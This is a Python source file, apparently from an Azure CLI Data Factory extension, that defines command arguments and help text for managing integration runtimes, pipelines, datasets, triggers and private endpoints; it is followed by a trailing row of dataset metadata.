c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('permissions', type=str, help='The string with permissions for Data Plane access. Currently only '
'\'r\' is supported which grants read only access.')
c.argument('access_resource_path', type=str, help='The resource path to get access relative to factory. '
'Currently only empty string is supported which corresponds to the factory resource.')
c.argument('profile_name', type=str, help='The name of the profile. Currently only the default is supported. '
'The default value is DefaultProfile.')
c.argument('start_time', type=str, help='Start time for the token. If not specified the current time will be '
'used.')
c.argument('expire_time', type=str, help='Expiration time for the token. Maximum duration for the token is '
'eight hours and by default the token will expire in eight hours.')
with self.argument_context('datafactory get-git-hub-access-token') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', options_list=['--name', '-n', '--factory-name'], type=str, help='The factory name.',
id_part='name')
c.argument('git_hub_access_code', type=str, help='GitHub access code.')
c.argument('git_hub_client_id', type=str, help='GitHub application client ID.')
c.argument('git_hub_access_token_base_url', type=str, help='GitHub access token base URL.')
with self.argument_context('datafactory integration-runtime list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory integration-runtime show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the integration runtime entity. Should only be specified '
'for get. If the ETag matches the existing entity tag, or if * was provided, then no content will '
'be returned.')
with self.argument_context('datafactory integration-runtime linked-integration-runtime create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.')
c.argument('name', type=str, help='The name of the linked integration runtime.')
c.argument('subscription_id', type=str, help='The ID of the subscription that the linked integration runtime '
'belongs to.')
c.argument('data_factory_name', type=str, help='The name of the data factory that the linked integration '
'runtime belongs to.')
c.argument('location', arg_type=get_location_type(self.cli_ctx), required=False,
validator=get_default_location_from_resource_group)
with self.argument_context('datafactory integration-runtime managed create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.')
c.argument('if_match', type=str, help='ETag of the integration runtime entity. Should only be specified for '
'update, for which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Integration runtime description.')
c.argument('compute_properties', type=validate_file_or_dict, help='The compute resource for managed '
'integration runtime. Expected value: json-string/json-file/@json-file.', arg_group='Type '
'Properties')
c.argument('ssis_properties', type=validate_file_or_dict, help='SSIS properties for managed integration '
'runtime. Expected value: json-string/json-file/@json-file.', arg_group='Type Properties')
with self.argument_context('datafactory integration-runtime self-hosted create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.')
c.argument('if_match', type=str, help='ETag of the integration runtime entity. Should only be specified for '
'update, for which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Integration runtime description.')
c.argument('linked_info', type=validate_file_or_dict, help='The base definition of a linked integration '
'runtime. Expected value: json-string/json-file/@json-file.', arg_group='Type Properties')
with self.argument_context('datafactory integration-runtime update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('auto_update', arg_type=get_enum_type(['On', 'Off']), help='Enables or disables the auto-update '
'feature of the self-hosted integration runtime. See https://go.microsoft.com/fwlink/?linkid=854189.'
'')
c.argument('update_delay_offset', type=str, help='The time offset (in hours) in the day, e.g., PT03H is 3 '
'hours. The integration runtime auto update will happen on that time.')
with self.argument_context('datafactory integration-runtime delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime get-connection-info') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime get-monitoring-data') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime get-status') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime list-auth-key') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.')
with self.argument_context('datafactory integration-runtime regenerate-auth-key') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('key_name', arg_type=get_enum_type(['authKey1', 'authKey2']), help='The name of the authentication '
'key to regenerate.')
with self.argument_context('datafactory integration-runtime remove-link') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('linked_factory_name', type=str, help='The data factory name for linked integration runtime.')
with self.argument_context('datafactory integration-runtime start') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime stop') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime sync-credentials') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime upgrade') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the integration runtime entity. Should only be specified '
'for get. If the ETag matches the existing entity tag, or if * was provided, then no content will '
'be returned.')
with self.argument_context('datafactory integration-runtime-node show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
with self.argument_context('datafactory integration-runtime-node update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
c.argument('concurrent_jobs_limit', type=int, help='The number of concurrent jobs permitted to run on the '
'integration runtime node. Values between 1 and maxConcurrentJobs(inclusive) are allowed.')
with self.argument_context('datafactory integration-runtime-node delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
with self.argument_context('datafactory integration-runtime-node get-ip-address') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
with self.argument_context('datafactory linked-service list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory linked-service show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the linked service entity. Should only be specified for '
'get. If the ETag matches the existing entity tag, or if * was provided, then no content will be '
'returned.')
with self.argument_context('datafactory linked-service create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.')
c.argument('if_match', type=str, help='ETag of the linkedService entity. Should only be specified for update, '
'for which it should match existing entity or can be * for unconditional update.')
c.argument('properties', type=validate_file_or_dict, help='Properties of linked service. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory linked-service update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.', id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the linkedService entity. Should only be specified for update, '
'for which it should match existing entity or can be * for unconditional update.')
c.argument('connect_via', type=validate_file_or_dict, help='The integration runtime reference. Expected value: '
'json-string/json-file/@json-file.')
c.argument('description', type=str, help='Linked service description.')
c.argument('parameters', type=validate_file_or_dict, help='Parameters for linked service. Expected value: '
'json-string/json-file/@json-file.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'linked service. Expected value: json-string/json-file/@json-file.')
c.ignore('linked_service')
with self.argument_context('datafactory linked-service delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.', id_part='child_name_1')
with self.argument_context('datafactory dataset list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory dataset show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str, help='The dataset name.',
id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the dataset entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory dataset create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str,
help='The dataset name.')
c.argument('if_match', type=str, help='ETag of the dataset entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('properties', type=validate_file_or_dict, help='Dataset properties. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory dataset update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str, help='The dataset name.',
id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the dataset entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Dataset description.')
c.argument('structure', type=validate_file_or_dict, help='Columns that define the structure of the dataset. '
'Type: array (or Expression with resultType array), itemType: DatasetDataElement. Expected value: '
'json-string/json-file/@json-file.')
c.argument('schema', type=validate_file_or_dict, help='Columns that define the physical type schema of the '
'dataset. Type: array (or Expression with resultType array), itemType: DatasetSchemaDataElement. '
'Expected value: json-string/json-file/@json-file.')
c.argument('linked_service_name', type=validate_file_or_dict, help='Linked service reference. Expected value: '
'json-string/json-file/@json-file.')
c.argument('parameters', type=validate_file_or_dict, help='Parameters for dataset. Expected value: '
'json-string/json-file/@json-file.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'Dataset. Expected value: json-string/json-file/@json-file.')
c.argument('folder', action=AddFolder, nargs='+', help='The folder that this Dataset is in. If not specified, '
'Dataset will appear at the root level.')
c.ignore('dataset')
with self.argument_context('datafactory dataset delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str, help='The dataset name.',
id_part='child_name_1')
with self.argument_context('datafactory pipeline list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory pipeline show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the pipeline entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory pipeline create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.')
c.argument('if_match', type=str, help='ETag of the pipeline entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('pipeline', type=validate_file_or_dict, help='Pipeline resource definition. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory pipeline update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.', id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the pipeline entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='The description of the pipeline.')
c.argument('activities', type=validate_file_or_dict, help='List of activities in pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('parameters', type=validate_file_or_dict, help='List of parameters for pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('variables', type=validate_file_or_dict, help='List of variables for pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('concurrency', type=int, help='The max number of concurrent runs for the pipeline.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'Pipeline. Expected value: json-string/json-file/@json-file.')
c.argument('run_dimensions', type=validate_file_or_dict, help='Dimensions emitted by Pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('duration', type=validate_file_or_dict, help='TimeSpan value, after which an Azure Monitoring '
'Metric is fired. Expected value: json-string/json-file/@json-file.', arg_group='Policy Elapsed '
'Time Metric')
c.argument('folder_name', type=str, help='The name of the folder that this Pipeline is in.',
arg_group='Folder')
c.ignore('pipeline')
with self.argument_context('datafactory pipeline delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.', id_part='child_name_1')
with self.argument_context('datafactory pipeline create-run') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.')
c.argument('reference_pipeline_run_id', type=str, help='The pipeline run identifier. If run ID is specified '
'the parameters of the specified run will be used to create a new run.')
c.argument('is_recovery', arg_type=get_three_state_flag(), help='Recovery mode flag. If recovery mode is set '
'to true, the specified referenced pipeline run and the new run will be grouped under the same '
'groupId.')
c.argument('start_activity_name', type=str, help='In recovery mode, the rerun will start from this activity. '
'If not specified, all activities will run.')
c.argument('start_from_failure', arg_type=get_three_state_flag(), help='In recovery mode, if set to true, the '
'rerun will start from failed activities. The property will be used only if startActivityName is '
'not specified.')
c.argument('parameters', type=validate_file_or_dict, help='Parameters of the pipeline run. These parameters '
'will be used only if the runId is not specified. Expected value: json-string/json-file/@json-file.')
with self.argument_context('datafactory pipeline-run show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_1')
with self.argument_context('datafactory pipeline-run cancel') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_1')
c.argument('is_recursive', arg_type=get_three_state_flag(), help='If true, cancel all the Child pipelines that '
'are triggered by the current pipeline.')
with self.argument_context('datafactory pipeline-run query-by-factory') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('last_updated_after', help='The time at or after which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('last_updated_before', help='The time at or before which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('filters', action=AddFilters, nargs='+', help='List of filters.')
c.argument('order_by', action=AddOrderBy, nargs='+', help='List of OrderBy option.')
with self.argument_context('datafactory activity-run query-by-pipeline-run') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_1')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('last_updated_after', help='The time at or after which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('last_updated_before', help='The time at or before which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('filters', action=AddFilters, nargs='+', help='List of filters.')
c.argument('order_by', action=AddOrderBy, nargs='+', help='List of OrderBy option.')
with self.argument_context('datafactory trigger list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory trigger show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the trigger entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory trigger create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str,
help='The trigger name.')
c.argument('if_match', type=str, help='ETag of the trigger entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('properties', type=validate_file_or_dict, help='Properties of the trigger. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory trigger update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the trigger entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Trigger description.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'trigger. Expected value: json-string/json-file/@json-file.')
c.ignore('trigger')
with self.argument_context('datafactory trigger delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger get-event-subscription-status') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger query-by-factory') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('parent_trigger_name', type=str, help='The name of the parent TumblingWindowTrigger to get the '
'child rerun triggers')
with self.argument_context('datafactory trigger start') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger stop') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger subscribe-to-event') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger unsubscribe-from-event') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the trigger entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory trigger-run cancel') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', type=str, help='The trigger name.', id_part='child_name_1')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_2')
with self.argument_context('datafactory trigger-run query-by-factory') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('last_updated_after', help='The time at or after which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('last_updated_before', help='The time at or before which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('filters', action=AddFilters, nargs='+', help='List of filters.')
c.argument('order_by', action=AddOrderBy, nargs='+', help='List of OrderBy option.')
with self.argument_context('datafactory trigger-run rerun') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', type=str, help='The trigger name.', id_part='child_name_1')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_2')
with self.argument_context('datafactory managed-virtual-network list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory managed-virtual-network show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--name', '-n', '--managed-virtual-network-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the managed Virtual Network entity. Should only be '
'specified for get. If the ETag matches the existing entity tag, or if * was provided, then no '
'content will be returned.')
with self.argument_context('datafactory managed-virtual-network create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('managed_virtual_network_name', options_list=['--name', '-n', '--managed-virtual-network-name'],
type=str, help='Managed virtual network name')
c.argument('if_match', type=str, help='ETag of the managed Virtual Network entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
with self.argument_context('datafactory managed-virtual-network update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--name', '-n', '--managed-virtual-network-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the managed Virtual Network entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
c.ignore('managed_virtual_network')
with self.argument_context('datafactory managed-private-endpoint list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name')
with self.argument_context('datafactory managed-private-endpoint show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name', id_part='child_name_2')
c.argument('if_none_match', type=str, help='ETag of the managed private endpoint entity. Should only be '
'specified for get. If the ETag matches the existing entity tag, or if * was provided, then no '
'content will be returned.')
with self.argument_context('datafactory managed-private-endpoint create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name')
c.argument('if_match', type=str, help='ETag of the managed private endpoint entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
c.argument('fqdns', nargs='+', help='Fully qualified domain names')
c.argument('group_id', type=str, help='The groupId to which the managed private endpoint is created')
c.argument('private_link_resource_id', options_list=['--private-link-resource-id', '--private-link'], type=str,
help='The ARM resource ID of the resource to which the managed private endpoint is created')
with self.argument_context('datafactory managed-private-endpoint update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name', id_part='child_name_2')
c.argument('if_match', type=str, help='ETag of the managed private endpoint entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
c.argument('fqdns', nargs='+', help='Fully qualified domain names')
c.argument('group_id', type=str, help='The groupId to which the managed private endpoint is created')
c.argument('private_link_resource_id', options_list=['--private-link-resource-id', '--private-link'], type=str,
help='The ARM resource ID of the resource to which the managed private endpoint is created')
c.ignore('managed_private_endpoint')
with self.argument_context('datafactory managed-private-endpoint delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name', id_part='child_name_2')
| 73.434783 | 120 | 0.672281 | 6,495 | 48,981 | 4.889299 | 0.051732 | 0.091825 | 0.067893 | 0.065248 | 0.888462 | 0.875488 | 0.858074 | 0.837291 | 0.813862 | 0.809768 | 0 | 0.002288 | 0.19677 | 48,981 | 666 | 121 | 73.545045 | 0.80487 | 0.010331 | 0 | 0.648789 | 0 | 0.020761 | 0.481563 | 0.069723 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00173 | false | 0 | 0.00519 | 0 | 0.00692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7663a99c630bf2660be058a4631d5ed9bc3e5862 | 95 | py | Python | QuantTorch/DorefaNet.py | Enderdead/BinaryConnect_PyTorch | 990e970b1fbd299ff88200db21a9cc3fe44706d3 | [
"MIT"
] | 75 | 2019-03-19T07:36:56.000Z | 2021-12-23T02:34:59.000Z | QuantTorch/DorefaNet.py | Enderdead/BinaryConnect_PyTorch | 990e970b1fbd299ff88200db21a9cc3fe44706d3 | [
"MIT"
